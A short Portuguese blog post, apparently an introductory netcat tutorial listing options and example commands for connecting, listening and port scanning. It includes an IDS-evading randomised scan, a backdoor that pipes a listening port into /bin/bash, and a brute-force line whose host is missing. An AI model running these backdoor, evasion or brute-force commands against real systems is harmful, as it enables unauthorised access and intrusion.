O netcat é uma ferramenta conhecida pelos administradores de redes como o canivete suíço, irei expor nesse post algumas opções básicas desta ferramenta.
Para listar algumas opções disponíveis
# nc -h
-l = coloca uma porta em estado de listenning (escuta);
-p = define uma porta local;
-v = ativa o recebimento de eco (verbose);
-vv = ativa o recebimento de eco. Mostra mais detalhes que -v;
-u = utiliza o protocolo UDP ao invés de TCP;
-t = para se conectar a TELNET;
-o = gera um log em formato hexadecimal;
-w = determina um tempo máximo para aguardar uma reposta;
-e = redireciona arquivos;
-n = recebe e faz conexões apenas em formato numérico
1) Conectando-se a um host
# nc www.meudominio.com 80
2) Abrindo uma porta (listenning)
# nc -l 1234
3) Escaneando portas com o Netcat
# nc -z -vv www.meudominio.com.br 1-1024
aqui podemos utilizar tabmbem a opção -r para randomizar o scan o que dificultará a detecção por IDS
# nc -z -r -vv www.meudominio.com.br 1-1024
4) Abrindo a porta, dando entrada para um "shell" (=backdoor)
# nc -l 1033 | /bin/bash
5) Realizando um brute-force
# nc -vv 79 < ~/wordlists.txt > bruteforce.log
Além de muitas outras opções existentes, combinar as opções é por sua conta, use sua criatividade, você pode conseguir resultados impressionantes.
Para mais detalhes
$ man nc
netcat.sourceforge.net
Nenhum comentário:
Postar um comentário